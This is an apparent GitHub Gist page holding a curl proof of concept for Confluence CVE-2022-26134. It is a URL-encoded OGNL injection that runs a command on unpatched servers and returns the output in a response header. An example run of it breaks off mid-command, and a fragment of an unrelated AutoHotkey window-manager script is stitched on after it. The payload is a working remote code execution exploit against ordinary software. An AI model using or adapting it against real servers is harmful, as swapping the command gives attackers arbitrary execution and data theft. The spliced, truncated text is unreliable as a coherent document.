Skip to content

Instantly share code, notes, and snippets.

@jbaines-r7
jbaines-r7 / cve_2022_26134_curl.md
Created June 6, 2022 18:06
Confluence CVE-2022-26134 Curl PoC

The following curl proof of concept will exfiltrate an executed command on Confluence 7.18.0 and below. The command below executes whoami and will store it in the X-Cmd-Response HTTP header.

curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Example:

albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script
@crosstyan
crosstyan / komorebic.ahk
Last active June 8, 2024 14:19
komorebic.ahk for AutoHotkey v2
#SingleInstance Force
WorkspaceNumber := 9
ArrayFromZero(Length){
temp := []
Loop Length {
temp.Push(A_Index-1)
}
return temp